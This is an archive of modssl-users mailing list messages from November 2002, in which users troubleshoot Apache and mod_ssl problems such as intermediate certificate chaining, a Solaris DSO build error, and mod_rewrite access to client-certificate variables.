> 2. Where can I download mod_ssl for Apache-2.0.39? (In case, the default
> "ssl" module in Apache 2.0.39 is not recommended.)

the one that comes with apache is fine

Cheers

Daniel
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 18 09:17:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA25545; Mon, 18 Nov 2002 09:16:25 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id JAA25509; Mon, 18 Nov 2002 09:15:19 +0100 (MET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Mon, 18 Nov 2002 00:15:13 -0800
X-Originating-IP: [203.116.243.1]
From: "Xeruz at Hotmail" 
To: 
References:  <20021118065448.GA8823@rawbyte.com>
Subject: Re: mod-ssl for apache 2.0.x - wasn't compiled
Date: Mon, 18 Nov 2002 16:21:49 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2615.200
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
Message-ID: 
X-OriginalArrivalTime: 18 Nov 2002 08:15:13.0315 (UTC) FILETIME=[9E824F30:01C28EDA]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Xeruz at Hotmail" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks a lot Daniel and Mads. It does work.

I would love to use 2.0.43 instead of 2.0.39 but my developers have
developed some experimental code on 2.0.39, so they prefer only 2.0.39 for
this moment.


----- Original Message -----
From: Daniel Lopez 
To: 
Sent: Monday, November 18, 2002 2:54 PM
Subject: Re: mod-ssl for apache 2.0.x - wasn't compiled


>
>
> > [Questions]
> > 1. Where can I explore further about mod_ssl on Apache-2.0.x ? Any link?
>
> I have a detailed chapter online just on that :
> http://www.apacheworld.org/ty24/
>
> > 2. Where can I download mod_ssl for Apache-2.0.39? (In case, the default
> > "ssl" module in Apache 2.0.39 is not recommended.)
>
> the one that comes with apache is fine
>
> Cheers
>
> Daniel
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 18 19:47:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA16223; Mon, 18 Nov 2002 19:46:15 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hscmail.med.utah.edu id TAA16215; Mon, 18 Nov 2002 19:45:12 +0100 (MET)
Received: from gwdom2-med.med.utah.edu ([155.100.100.43])
 by hscmail.med.utah.edu (PMDF V6.1-1 #38364)
 with SMTP id <0H5S002KOC3ABI@hscmail.med.utah.edu> for
 modssl-users@modssl.org; Mon, 18 Nov 2002 11:45:10 -0700 (MST)
Received: from GWY-Message_Server by gwdom2-med.med.utah.edu	with
 Novell_GroupWise; Mon, 18 Nov 2002 11:45:00 -0700
Date: Mon, 18 Nov 2002 11:44:49 -0700
From: Evan Dillon 
Subject: Intermediate Certificate chaining problem?
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
X-Mailer: Novell GroupWise Internet Agent 5.5.5.1
Content-type: text/plain; charset=US-ASCII
Content-disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA16220
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Evan Dillon 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I need help solving the following problem

I have recently obtained and installed a secure certificate from VeriSign. However, vistors to my site still get an error message stating that we are using a certificate signed by an untrusted CA. Netscape and Mozilla users are alerted by pop-up while IE users would only notice the error if they explore the certificate by clicking the 'lock' icon.

This is the information provided by "Issuer" under the "Details" tab of "Certificate Information" in IE6/Win98, the same information is provided by Mozilla 1.0.1/RH7.3
OU = www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
OU = VeriSign International Server CA - Class 3
OU = VeriSign, Inc.
O = VeriSign Trust Network

I have installed the certificate and the intermediate certificate per modssl  intructions and verified installation with VeriSign instructions but visitors to my site still get an error that the cert has been signed by an untrusted CA. However, the properties of the cert reveal that the issuer is indeed VeriSign Trust Network. VeriSign support has told me that it is an installation error, and that the cert is not "Chaining."

My installation: I received the cert from Verisign as an email attachment and saved the cert to: $APACHE_HOME/conf/ssl.crt/server.crt. I then visited the VeriSign web site copied and pasted the intermediate cert into a text editor (gEdit) and saved the file to $APACHE_HOME/conf/ssl.crt/ca.crt. I updated my conf with the following directives:



...

SSLCertificateFile      conf/ssl.crt/server.crt  
SSLCertificateKeyFile   conf/ssl.key/server.key
SSLCACertificateFile    conf/ssl.crt/ca.crt
	
SSLProtocol 		-all +SSLv2
SSLCipherSuite 		SSLv2:+HIGH:+MEDIUM:+LOW:+EXP



Apache was then restarted $APACHE_HOME/bin/apachectl stop $APACHE_HOME/bin/apachectl startssl. I have even tried recompling Apache and used `make certifcate TYPE=existing`

I am using:
RH 7.1
Apache 1.3.27
openssl-0.9.6e
mod_ssl-2.8.12-1.3.27

Has anyone else experienced this or can they point out any errors with my process?

Thanks

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 18 20:17:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA18074; Mon, 18 Nov 2002 20:16:26 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA18067; Mon, 18 Nov 2002 20:15:55 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 4E95A4CE6E2; Mon, 18 Nov 2002 20:15:55 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 490F3285CE; Mon, 18 Nov 2002 20:15:47 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from tumbleweed id UAA17529; Mon, 18 Nov 2002 20:10:04 +0100 (MET)
Received: from 192.168.3.10 by tumbleweed with ESMTP (WorldSecure Server
 SMTP Relay(WSS) v4.5); Mon, 18 Nov 2002 14:10:45 -0500
X-Server-Uuid: 25a6c030-5ea1-11d6-beb9-0050bab0e8a4
Received: from CGI00916 ([192.168.3.56]) by
 accord.mail.teambellesdi2003.com with SMTP (Microsoft Exchange Internet
 Mail Service Version 5.5.2653.13) id 4H8WSRQ2; Mon, 18 Nov 2002 14:14:
 59 -0500
Message-ID: <011701c28f36$4135b540$3803a8c0@teambellesdi2003.com>
From: "Harry Yu" 
To: modssl-users@modssl.org
Subject: Fw: Can I get SSL_CLIENT_S_DN_CN within Rewrite Module?
Date: Mon, 18 Nov 2002 14:11:10 -0500
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
X-WSS-ID: 11C7E4BE106865-01-01
Content-Type: text/plain; 
 charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Harry Yu" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I never got any response since I sent this to you last week. Could you pls
send response at harry.yu@cgi.com

Thanks a lot and best regards.

Harry Yu
----- Original Message -----
From: "Harry Yu" 
To: 
Sent: Wednesday, November 13, 2002 8:36 PM
Subject: Can I get SSL_CLIENT_S_DN_CN within Rewrite Module?


> Dear expert:
>
> We are trying to get the SSL_CLIENT_S_DN_CN from client certificate
> and put it into request as a quary string by using RewriteRule, but we
could
> not
> rewrite it and always get empty quary string. The config is as following:
>
> SSLOptions +StdEnvVars
>
> RewriteEngine On
> RewriteOptions inherit
> RewriteLog logs/rewrite.log
> RewriteLogLevel 9
> #RewriteRule ^/esdi/pat$
/esdi/pat?SSL_CLIENT_S_DN_CN=%{SSL_CLIENT_S_DN_CN}
> #RewriteCond %{HTTP_USER_AGENT} ^Mozilla.*
> #RewriteCond %{ENV:SSL_CLIENT_S_DN_CN} ^(.*)$
> RewriteCond %{ENV:SSL_CLIENT_S_DN_CN} (.*)
> RewriteRule ^/esdi/pat$ - [E=ID:%1,C]
> RewriteRule ^/esdi/pat$ /esdi/pat?pat-id=%{ENV:ID} [L]
>
> Can I get environment varable like SSL_CLIENT_XXX within Rewrite Module, I
> have no problem
> to get %{SERVER_NAME} and rewrite it into quary string.
>
> Is it correct? Hope to get your help soon. Thanks in advance!
>
> Harry Yu
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 18 23:01:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA23217; Mon, 18 Nov 2002 23:00:46 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtprelay7.dc2.adelphia.net id WAA23073; Mon, 18 Nov 2002 22:59:24 +0100 (MET)
Received: from bingo ([68.69.143.53]) by
          smtprelay7.dc2.adelphia.net (Netscape Messaging Server 4.15
          smtprelay7 Dec  7 2001 09:58:59) with SMTP id H5SL2R02.SEW; Mon,
          18 Nov 2002 16:59:15 -0500 
Content-Type: text/plain;
  charset="iso-8859-1"
From: Ed Loehr 
To: modssl-users@modssl.org, Evan Dillon 
Subject: Re: Intermediate Certificate chaining problem?
Date: Mon, 18 Nov 2002 14:59:14 -0700
X-Mailer: KMail [version 1.2]
References: 
In-Reply-To: 
MIME-Version: 1.0
Message-Id: <0211181459140I.25734@bingo>
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ed Loehr 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Monday 18 November 2002 11:44 am, Evan Dillon wrote:
>
> My installation: I received the cert from Verisign as an email
> attachment and saved the cert to:
> $APACHE_HOME/conf/ssl.crt/server.crt. I then visited the VeriSign
> web site copied and pasted the intermediate cert into a text editor
> (gEdit) and saved the file to $APACHE_HOME/conf/ssl.crt/ca.crt. I
> updated my conf with the following directives:
>
> 
>
> ...
>
> SSLCertificateFile      conf/ssl.crt/server.crt
> SSLCertificateKeyFile   conf/ssl.key/server.key
> SSLCACertificateFile    conf/ssl.crt/ca.crt
>
> SSLProtocol 		-all +SSLv2
> SSLCipherSuite 		SSLv2:+HIGH:+MEDIUM:+LOW:+EXP
>
> 

Evan,

You didn't say but did you add the SSLCertificateChainFile directive 
to point to the intermediate ca.crt?

BTW, 0.9.6e may have security issues, not sure.  There are 2 newer 
releases.  

Regards,
Ed
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 18 23:07:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA23385; Mon, 18 Nov 2002 23:06:33 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtprelay7.dc2.adelphia.net id XAA23365; Mon, 18 Nov 2002 23:05:34 +0100 (MET)
Received: from bingo ([68.69.143.53]) by
          smtprelay7.dc2.adelphia.net (Netscape Messaging Server 4.15
          smtprelay7 Dec  7 2001 09:58:59) with SMTP id H5SLD400.TG9; Mon,
          18 Nov 2002 17:05:28 -0500 
Content-Type: text/plain;
  charset="iso-8859-1"
From: Ed Loehr 
To: modssl-users@modssl.org, Evan Dillon 
Subject: Re: Intermediate Certificate chaining problem?
Date: Mon, 18 Nov 2002 15:05:27 -0700
X-Mailer: KMail [version 1.2]
References:  <0211181459140I.25734@bingo>
In-Reply-To: <0211181459140I.25734@bingo>
MIME-Version: 1.0
Message-Id: <0211181505270J.25734@bingo>
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ed Loehr 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Monday 18 November 2002 02:59 pm, Ed Loehr wrote:
> > SSLCACertificateFile    conf/ssl.crt/ca.crt
>
> You didn't say but did you add the SSLCertificateChainFile
> directive to point to the intermediate ca.crt?
>
> BTW, 0.9.6e may have security issues, not sure.  There are 2 newer
> releases.

I'm not sure you need the SSLCACertificateFile directive.  The 
default may point to a bundle of CA certs provided with the 
distribution.

Regards,
Ed
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 19 00:53:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA27804; Tue, 19 Nov 2002 00:52:29 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hscmail.med.utah.edu id AAA27799; Tue, 19 Nov 2002 00:52:03 +0100 (MET)
Received: from gwdom2-med.med.utah.edu ([155.100.100.43])
 by hscmail.med.utah.edu (PMDF V6.1-1 #38364)
 with SMTP id <0H5S009MZQAPM1@hscmail.med.utah.edu> for
 modssl-users@modssl.org; Mon, 18 Nov 2002 16:52:01 -0700 (MST)
Received: from GWY-Message_Server by gwdom2-med.med.utah.edu	with
 Novell_GroupWise; Mon, 18 Nov 2002 16:51:53 -0700
Date: Mon, 18 Nov 2002 16:51:44 -0700
From: Evan Dillon 
Subject: Re: Intermediate Certificate chaining problem?
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
X-Mailer: Novell GroupWise Internet Agent 5.5.5.1
Content-type: multipart/alternative; boundary="=_F8A41109.8AEB9D9D"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Evan Dillon 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a MIME message. If you are reading this text, you may want to 
consider changing to a mail reader or gateway that understands how to 
properly handle MIME multipart messages.

--=_F8A41109.8AEB9D9D
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: quoted-printable

I see that I have made a mistake in my configuration and corrected it, =
however now apache won't start in ssl mode: the ssl_engine_log shows the =
error "Failed to configure CA certificate chain!" Any ideas? A search for =
the string "Failed to configure CA certificate chain!" doesn't return much =
that is helpful

I changed

SSLCACertificateFile    conf/ssl.crt/ca.crt

to

SSLCertificateChainFile conf/ssl.crt/ca.crt=20

I have also installed the latest version of openssl

However, when starting apache this time around, the ssl_engin_log states:
[18/Nov/2002 16:36:39 09640] [info]  Server: Apache/1.3.27, Interface: =
mod_ssl/2.8.12, Library: OpenSSL/0.9.6g
...
[18/Nov/2002 16:36:39 09641] [info]  Init: (www.hr.utah.edu:443) RSA =
server certificate enables Server Gated Cryptography (SGC)
[18/Nov/2002 16:36:39 09641] [error] Init: (www.hr.utah.edu:443) Failed to =
configure CA certificate chain!

Thanks

Evan

>>> modssl-users@bluepolka.net 11/18/02 03:05PM >>>
On Monday 18 November 2002 02:59 pm, Ed Loehr wrote:
> > SSLCACertificateFile    conf/ssl.crt/ca.crt
>
> You didn't say but did you add the SSLCertificateChainFile
> directive to point to the intermediate ca.crt?
>
> BTW, 0.9.6e may have security issues, not sure.  There are 2 newer
> releases.

I'm not sure you need the SSLCACertificateFile directive.  The=20
default may point to a bundle of CA certs provided with the=20
distribution.

Regards,
Ed
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

--=_F8A41109.8AEB9D9D
Content-Type: text/html; charset=ISO-8859-1
Content-Description: HTML
Content-Transfer-Encoding: quoted-printable







I see that I have made a mistake in my configuration and corrected =
it,=20
however now apache won't start in ssl mode: the ssl_engine_log shows the =
error=20
"Failed to configure CA certificate chain!" Any ideas? A search for the =
string=20
"Failed to configure CA certificate chain!" doesn't return much that is=20
helpful


 


I changed


 


SSLCACertificateFile    conf/ssl.crt/ca.crt


 


to


 


SSLCertificateChainFile conf/ssl.crt/ca.crt 


 


I have also installed the latest version of openssl


 


However, when starting apache this time around, the ssl_engin_log=20
states:


[18/Nov/2002 16:36:39 09640] [info]  Server: Apache/1.3.27, =
Interface:=20
mod_ssl/2.8.12, Library: OpenSSL/0.9.6g
...


[18/Nov/2002 16:36:39 09641] [info]  Init: (www.hr.utah.edu:443) RSA server=20
certificate enables Server Gated Cryptography (SGC)
[18/Nov/2002 =
16:36:39=20
09641] [error] Init: (www.hr.utah.edu:443) Failed to =
configure=20
CA certificate chain!


Thanks


 


Evan

>>> modssl-users@bluepolka.net 11/18/02 =
03:05PM=20
>>>
On Monday 18 November 2002 02:59 pm, Ed Loehr wrote:
>=
;=20
> SSLCACertificateFile    conf/ssl.crt/ca.crt
>
=
>=20
You didn't say but did you add the SSLCertificateChainFile
> =
directive to=20
point to the intermediate ca.crt?
>
> BTW, 0.9.6e may have =
security=20
issues, not sure.  There are 2 newer
> releases.

I'm not =
sure=20
you need the SSLCACertificateFile directive.  The 
default may =
point to=20
a bundle of CA certs provided with the=20

distribution.

Regards,
Ed
________________________________=
______________________________________
Apache=20
Interface to OpenSSL=20
(mod_ssl)           =
       =20
www.modssl.org
User Support Mailing=20
List            =
;         =20
modssl-users@modssl.org
Automated List=20
Manager           &n=
bsp;            =
;   =20
majordomo@modssl.org


--=_F8A41109.8AEB9D9D--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 19 08:17:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA11123; Tue, 19 Nov 2002 08:16:06 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA11117; Tue, 19 Nov 2002 08:15:45 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E05AE4CE620; Tue, 19 Nov 2002 08:15:44 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 8252C28AA2; Tue, 19 Nov 2002 07:57:31 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.slb.com id XAA23558; Mon, 18 Nov 2002 23:10:56 +0100 (MET)
Received: from conversion-daemon.nammta01.sugar-land.nam.slb.com by
 nammta01.sugar-land.nam.slb.com
 (iPlanet Messaging Server 5.2 HotFix 1.02 (built Sep 16 2002))
 id <0H5S00L01KOVE5@nammta01.sugar-land.nam.slb.com> for
 modssl-users@modssl.org; Mon, 18 Nov 2002 22:05:04 +0000 (GMT)
Received: from iris.san-jose.tt.slb.com
 (unused-105-33.san-jose.tt.slb.com [163.188.105.33])
 by nammta01.sugar-land.nam.slb.com
 (iPlanet Messaging Server 5.2 HotFix 1.02 (built Sep 16 2002))
 with ESMTP id <0H5S00E30LB1SQ@nammta01.sugar-land.nam.slb.com> for
 modssl-users@modssl.org; Mon, 18 Nov 2002 22:04:14 +0000 (GMT)
Received: from webshield (webshield [163.188.105.47])
	by iris.san-jose.tt.slb.com (8.9.3/8.9.3) with ESMTP id OAA21702	for
 ; Mon, 18 Nov 2002 14:05:38 -0800 (PST)
Date: Mon, 18 Nov 2002 17:03:25 -0500
From: Rick Crist 
Subject: Fatal relocation error with modssl on SPARC Solaris.
X-Sender: crist@pop.san-jose.tt.slb.com
To: modssl-users@modssl.org
Message-id: <5.1.0.14.2.20021118170007.00ab40b0@pop.san-jose.tt.slb.com>
MIME-version: 1.0
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rick Crist 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello All:

I am having difficulty installing a DSO version of modssl with Apache.
Configuration details are:

  o Sun Ultra 5
  o Solaris 2.6 (tried 8.0 with the same results)
  o gcc 2.95.3
  o openssl 0.9.6g
  o mm 1.2.1
  o apache 1.3.27
  o mod_ssl 2.8.12-1.3.27

OpenSSL was built as:

  $ cd ./openssl-0.9.6g
  $ sh config -fPIC
  $ make
  $ make install

The MM shared library was built as:

  $ cd ../mm-1.2.1
  $ ./configure --disable-shared
  $ make
  $ make install

Used option "b) The flexible APACI-only way" in the INSTALL document to 
apply mod_ssl to Apache:

  $ cd mod_ssl-2.8.12-1.3.27
  $ ./configure  --with-apache=../apache_1.3.27

Apache was configured with the following script:

  #!/bin/sh
  SSL_BASE=../openssl-0.9.6g \
  EAPI_MM=../mm-1.2.1 \
  CFLAGS=-fPIC \
  LIBS=/usr/lib/libC.so.5 \
  LDFLAGS='-L /usr/local/lib -R /usr/local/lib' \
  ./configure --prefix=/usr/local/apache \
              --enable-module=so \
              --enable-module=ssl \
              --enable-shared=ssl \
              --disable-rule=SSL_COMPAT \
              --enable-rule=SSL_SDBM \
              --enable-rule=EAPI

  $ make
  $ make install

After compiling and installing, I get the following error message:

  $ cd /usr/local/apache/bin
  $ ./apachectl startssl
  Syntax error on line 206 of /usr/local/apache/conf/httpd.conf: 
  Cannot load /usr/local/apache/libexec/libssl.so into server: ld.so.1: /usr/local/apache/bin/httpd: fatal: relocation error: file /usr/local/apache/libexec/libssl.so: symbol ap_mm_core_maxsegsize: referenced symbol not found
  ./apachectl startssl: httpd could not be started

This is using the stock version of httpd.conf.

The FAQ on the modssl web site indicates this is because EAPI is not applied.
However, as you can see from the configuration, it has been enabled, and the
configuration script confirms as much when run.

As for the syntax error on line 206, the offending line is:

  LoadModule ssl_module         libexec/libssl.so

If anyone can tell me what I am doing wrong, I would sure appreciate it.

Regards,

- Rick Crist
Rick Crist
Product Specialist - Test Systems
NPTest, Inc.
45 Winthrop Street, Concord, MA  01742
Phone: 978-318-4056,  Fax: 978-287-0138,  Cell: 978-764-3427
E-Mail: mailto:rcrist@nptest.com
Web: www.nptest.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 19 19:46:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA12203; Tue, 19 Nov 2002 19:45:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mercury.pricegrabber.com id TAA12113; Tue, 19 Nov 2002 19:44:48 +0100 (MET)
Received: from wednesday.noc.pricegrabber.com (wednesday.noc.pricegrabber.com [192.168.9.1])
	(authenticated bits=0)
	by mercury.pricegrabber.com (8.12.6/8.12.6) with ESMTP id gAJIigtJ015775
	for ; Tue, 19 Nov 2002 10:44:42 -0800
Subject: Is this a bug or did I miss some docs?
From: Christopher McCrory 
To: modssl-users@modssl.org
Content-Type: text/plain
Organization: Pricegrabber
Message-Id: <1037731488.1956.55.camel@wednesday.noc.pricegrabber.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.0 (1.2.0-1) 
Date: 19 Nov 2002 10:44:48 -0800
Content-Transfer-Encoding: 7bit
X-RAVMilter-Version: 8.3.3(snapshot 20020312) (mercury.pricegrabber.com)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christopher McCrory 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello...

	While tracking down a bug on our web site, I found the solution:
adding
SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

This is documented.  The problem was that this was in the global
httpd.conf file in a  stanza.

To get this to work I had to add it to my specific stanza:

        ServerName www.pricegrabber.com

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0


This is easy to test using the 
SSLCipherSuite ...
config

in 
SSLCipherSuite -ALL
...

The site still works.  Not until I add SSLCipherSuite -ALL to the
specific stanza does https break.

Did I just miss the documentation for this?



versions:
mod_ssl-2.8.11-0.01pg
apache-1.3.27-0.27pg
openssl-0.9.6b-28

from my main httpd.conf file I: 'include include.d' and have seperate
files for individual sites, i.e. include.d/httpd.conf.pg.ssl



-- 
Christopher McCrory 
Pricegrabber

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 19 20:46:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA15418; Tue, 19 Nov 2002 20:45:55 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA15338; Tue, 19 Nov 2002 20:44:28 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9B38A4CE747; Tue, 19 Nov 2002 20:44:27 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 4072428680; Tue, 19 Nov 2002 20:39:23 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost.localdomain id UAA13887; Tue, 19 Nov 2002 20:12:44 +0100 (MET)
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1])
	by localhost.localdomain (8.12.5/8.12.5) with ESMTP id gAJJCOSr015615
	for ; Tue, 19 Nov 2002 13:12:24 -0600
Received: (from kperrier@localhost)
	by localhost.localdomain (8.12.5/8.12.5/Submit) id gAJJCNul015613;
	Tue, 19 Nov 2002 13:12:23 -0600
X-Authentication-Warning: localhost.localdomain: kperrier set sender to kperrier@seitelsolutions.com using -f
Subject: Configuring a stand alone SSL enabled apache webserver
From: Kent Perrier 
To: modssl-users@modssl.org
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 (1.0.8-10) 
Date: 19 Nov 2002 13:12:23 -0600
Message-Id: <1037733143.1128.131.camel@localhost.localdomain>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kent Perrier 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all,

I am looked in the archives and I have not found anything, so I am
asking here.  I want to run a different web server on port 443 for SSL
traffic (not a virtual server in the configuration file for the server
on port 80).  Looking at log file, mod_ssl is loaded on start and it is
listening on port 443, but the server does not support SSL encrypted
traffic. I removed the SSLEngine On directive from the conf file since
that only works in a virtual server.  How do I make this work?  I am
running Apache 1.3.27, mod_ssl 2.8.12 0.9.6g

FYI, here is my httpd.conf

Thanks!

Kent

##
## httpd.conf -- Apache HTTP server configuration file
##

#
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See  for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.  
#
# After this file is processed, the server will look for and process
# /usr/local/apache1.3/conf/srm.conf and then /usr/local/apache1.3/conf/access.conf
# unless you have overridden these with ResourceConfig and/or
# AccessConfig directives here.
#
# The configuration directives are grouped into three basic sections:
#  1. Directives that control the operation of the Apache server process as a
#     whole (the 'global environment').
#  2. Directives that define the parameters of the 'main' or 'default' server,
#     which responds to requests that aren't handled by a virtual host.
#     These directives also provide default values for the settings
#     of all virtual hosts.
#  3. Settings for virtual hosts, which allow Web requests to be sent to
#     different IP addresses or hostnames and have them handled by the
#     same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "logs/foo.log"
# with ServerRoot set to "/usr/local/apache" will be interpreted by the
# server as "/usr/local/apache/logs/foo.log".
#

### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#

#
# ServerType is either inetd, or standalone.  Inetd mode is only supported on
# Unix platforms.
#
ServerType standalone

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE!  If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation
# (available at );
# you will save yourself a lot of trouble.
#
ServerRoot "/usr/local/apache1.3"

#
# The LockFile directive sets the path to the lockfile used when Apache
# is compiled with either USE_FCNTL_SERIALIZED_ACCEPT or
# USE_FLOCK_SERIALIZED_ACCEPT. This directive should normally be left at
# its default value. The main reason for changing it is if the logs
# directory is NFS mounted, since the lockfile MUST BE STORED ON A LOCAL
# DISK. The PID of the main server process is automatically appended to
# the filename. 
#
